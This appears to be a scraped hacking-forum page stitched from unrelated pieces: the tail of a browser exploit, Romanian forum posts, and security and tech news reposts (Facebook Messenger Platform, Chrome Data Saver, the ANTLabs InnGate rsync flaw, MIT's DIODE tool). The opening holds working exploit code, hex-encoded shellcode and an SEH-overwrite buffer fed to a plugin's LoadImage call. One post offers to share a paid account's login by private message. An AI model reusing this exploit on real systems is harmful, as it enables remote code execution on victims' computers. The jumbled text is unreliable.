"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++) { buff += "A"; } // [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode] fbuff = arg1 + nseh + seh + nops + sc + buff; target.LoadImage(fbuff); </script> </html> Source

@shadowSQLi am vorbit deja cu cei de la olx o sa imi vina pachetu prin curier joi ( cel tarziu vineri ). am sa revin cu edit cand primesc coletul sa va spun ce mi-au trimis.

Modular Everything in the browser is a module, a web-app running in its own process. Construct your own browsing experience by selecting the right modules for you. Hackable Want vertical tabs? Write some JS & CSS! Customised autocomplete engine? JS! Every behavior is programmatic and exposed through APIs. Open source The entire technology stack is open source. Modify existing modules and you can create your own to extend the behavior of Breach. Getting Involved Homepage: Breach - A new modular Browser Mailing list: breach-dev@googlegroups.com IRC Channel: #breach on Freenode You can find a list of Modules available or under developement here: List of Modules Runing Breach on Linux See instructions here: Running Breach on Linux Link: https://github.com/breach/breach_core/ Source: TF

Hello SilaxHe and welcome to forum.

O sa impart contul meu personal cu voi ( Trimiteti PM si o sa va dau User + Pass) - Peste 10 posturi (No troll / offtopic ) - Cel putin 2/3 luni vechime. - Nu postati aici, imi trimiteti PM! Cine nu respecta aceste conditii sa nu se oboseasca. Abonament de 10 luni 10.00 euro f?r? TVA SMS - 0********* - Vodafone 04.12.2014 16:06:24 04.10.2015 17:06:24 Activ

Yesterday at its annual F8 Developer Conference in San Francisco, Facebook officially turned its Messenger app into a Platform. Facebook's Messenger Platform allows third-party app developers to integrate their apps with Facebook messenger app. However, other popular messaging apps are already offering similar features, like Chinese WeChat, but Facebook release is much bigger than any other platform. At F8 Developer Conference, Facebook released SDK v4.0 for iOS and Android along with Graph API v2.3 that enable app developers to add new messenger platform features to their custom apps quickly. Facebook users can install these compatible third-party apps from the messenger app, which offers users to send animated GIFs, images, videos, and more content within the Facebook Messenger app easily. BOON FOR BOTH FACEBOOK AND THIRD PARTY DEVELOPERS Facebook Messenger Platform will offer third party app developers to reach out Facebook’s 600 Millions of users. So, the move will be a boon for third-party app developers. On the other hand, the move will help Facebook to integrate its messaging service directly into the vast ecosystem of Android and iOS apps. BUSINESSES ON MESSENGER The Social Networking giant also announced "Businesses on Messenger," feature that will soon let users connect directly with companies and make direct conversation, replacing the need for retailer chat windows in the process. When customers place an order for goods or services, they will be prompted to head to Facebook Messenger for communications including modifying orders, tracking orders, returning merchandise and getting answers to questions. Third party app developers who are interested in learning more and integrating their apps with the new Facebook Messenger Platform can grab the SDK on Facebook’s website. LAUNCH PARTNERS The new Messenger Platform is open to all developers, but Facebook launched 40 different apps initially with its partners, including ESPN, Giphy, Imgur, The Weather Channel and Bitmoji. The complete list of Messenger Platform launch partners are as follow: Action Movie FX Bitmoji Cleo Video Texting Clips ClipDis Ditty Dubsmash Effectify EmotionAR Emu ESPN FlipLip Voice Changer Fotor GIF Keyboard GIFJam Giphy Hook’d Imgur Imoji JibJab Kanvas Keek Legend Magisto Meme Generator Noah Camera Pic Stitch PicCollage GIF Cam PingTank Pyro! Score! on Friends Selfied Shout Sound Clips StayFilm Stickered Strobe Tackl Talking Tom Tempo The Weather Channel to.be Camera UltraText Wordeo Facebook users could also install these apps using a prompt message if they receive any message generated from updated apps. Source

Google want to save its users' bandwidth at home. The company has released a "Data Saver extension for Chrome," bringing its data compression feature for its desktop users for the first time. While tethering to a mobile Hotspot for Internet connection for your laptop, this new Data Saver extension for Chrome helps you reduce bandwidth usage by compressing the pages you visit over the Internet. If you are unaware of it, the data compression proxy service by Google is designed to save users' bandwidth, load pages faster, and increase security (by checking for malicious web pages) on your smartphones and tablets. REDUCE AS MUCH AS 50% OF DATA USAGE Until now, the data compression service has been meant to benefit only mobile users, but the latest Data Saver Chrome Extension aims at helping desktop users by reducing their data usage by as much as 50 percent. When you visit a website, web server delivers the requested files to your browser. If enabled by the server, Gzip compresses web pages and style sheets before sending them over to the browser. Gzip compression drastically reduces transfer time since the files are much smaller. Data Saver Extension for Chrome checks if the website you visited has gzip enabled or not. If not, it compresses the requested web page via Google Data Compression proxy and makes it significantly smaller. AVAILABLE FOR CHROME 41 AND HIGHER The Data Saver Chrome extension currently doesn't support secure SSL pages or incognito pages, and Google notes that users may experience issues when they have enabled the extension. Data Saver is available on Chrome both for Android as well as iOS. User will need Chrome 41 or higher version to use the extension. As soon as you install it, the extension starts to work by default. In case you want to disable it, click on the Data Saver icon in the menu bar and select "Turn Off Data Saver." You can now download Google's new Data Saver extension for Chrome, which is currently in beta version, from the Chrome Web Store. The extension was released on March 23, without any announcement from the search engine giant. Source

ANTLabs today is expected to roll out patches for a vulnerability in its InnGate Internet gateways that are popular in hospitality and convention locations. The gateways provide temporary Internet access to hotel guests or conference attendees using kiosks, for example. The vulnerability (CVE-2015-0932), discovered by security company Cylance, gives an attacker remote read and write access to the device’s file system. “Remote access is obtained through an unauthenticated rsync daemon running on TCP 873. Once the attacker has connected to the rsync daemon, they are then able to read and write to the file system of the Linux based operating system without restriction,” wrote researcher Brian Wallace in an advisory published today. Full read and write access can be leveraged for remote code execution and enable a hacker to backdoor the device or add an executable or a new authenticated root-level user, Cylance said. “Once full file system access is obtained, the endpoint is at the mercy of the attacker,” Wallace wrote. The exposed rsync command is trivial to abuse, Wallace said, using a few commonly known Linux or UNIX commands to find available rsync shares and list files in the root. There are also rsync commands for uploading and downloading files. Rsync is a utility on Linux and UNIX machines that is used for file synchronization and file transfers either locally or between remote computers. While the risk with such a vulnerability is generally limited to crimes such as fraud and identity theft, a research report last November from Kaspersky Lab on the DarkHotel APT group shows that targeted attacks against business hotel Wi-Fi networks is not out of the question. DarkHotel operates in Asia primarily compromising said Wi-Fi networks, infecting users as they connect with a phony software update such as Adobe Flash, which instead pushed a digitally signed piece of malware that includes a keylogger and other data-stealing capabilities that is sent via a backdoor to the attackers. The DarkHotel campaign also was able to access other systems on hotel networks such as machines running registration information. This capability allowed the APT group to infect only specific guests with the phony update installer. Cylance said its vulnerability is severe and requires little sophistication to exploit. “An attacker exploiting the vulnerability in CVE-2015-0932 would have the access to launch DarkHotel-esque attacks against guests on the affected hotel’s WiFi. Targets could be infected with malware using any method from modifying files being downloaded by the victim or by directly launching attacks against the now accessible systems,” Wallace said. “Given the level of access that this vulnerability offers to attackers, there is seemingly no limit to what they could do.” Cylance said it scanned the Internet’s IPv4 space for the ANTLabs devices and found 277 that could be compromised from the Internet, most of those in North America, but some in Asia, the Middle East and Europe. In addition to applying the patch upon its release, Cylance said locations running the vulnerable devices could block unauthenticated rsync processes via a TCP-DENY command on port 873. Source

tudents from M.I.T. have devised a new and more efficient way to scour raw code for integer overflows, the troublesome programming bugs that serve as a popular exploit vector for attackers and often lead to the crashing of systems. Researchers from the school’s Computer Science and Artificial Intelligence Laboratory (CSAIL) last week debuted the platform dubbed DIODE, short for Directed Integer Overflow Detection. As part of an experiment, the researchers tested DIODE on code from five different open source applications. While the system was able to generate inputs that triggered three integer overflows that were previously known, the system also found 11 new errors. Four of the 11 overflows the team found are apparently still lingering in the wild, but the developers of those apps have been informed and CSAIL is awaiting confirmation of fixes. Integer overflows result when computers can’t store numbers – usually because they haven’t been sanity checked – in the memory that’s been allocated for them. Sanity checks are simple queries to test functionality. The seven researchers behind DIODE – Stelios Sidiroglou-Douskos, Eric Lahtinen, Nathan Rittenhouse, Paolo Piselli, Fan Long, Deokhwan Kim, and Martin Rinard – presented the system last week at the 20th ASPLOS (Architectural Support for Programming Languages and Operating Systems) conference in Istanbul. The tool works by automatically generating inputs that trigger overflow errors at critical sites. DIODE, which is compatible with off-the-shelf x86 binaries, gets right to work and extracts target expressions and branch conditions for each memory allocation site. As Stelios Sidiroglou-Douskos, a research scientist at CSAIL and the lead author of the paper writes, whenever DIODE stumbles upon an integer that may be used in a dangerous operation, the system records the current state of the symbolic expression. The system doesn’t trigger an overflow right off the bat, but characterizes the values around it to better inform the programmer. If DIODE finds a trigger value, it marks it down to help in any future debugging. DIODE’s inputs should identify, then satisfy the requisite sanity checks and “generate an overflow in the target expression, and impose no other constraints on the specific path that the input takes to trigger the overflow,” according to Sidiroglou-Douskos. DIODE, which was supported on behalf of a DARPA grant, isn’t the first debugging tool developed to dig up integer overflows. Researchers with CSAIL previously developed static analysis tools that, like SIFT (.PDF) which points out inputs that can lead to overflow errors and KINT, (.PDF) a PHP tool. As the team’s academic paper points out however, unlike SIFT, which requires direct access to source code, DIODE works directly with stripped x86 code. The tool also bests KINT, which often generates a large number of false positives, by omitting false positives. M.I.T. hopes to release DIODE to the public as open source after the program it’s being developed under, DARPA’s Mission-oriented Resilient Clouds (MRC) program, concludes in October 2015. Source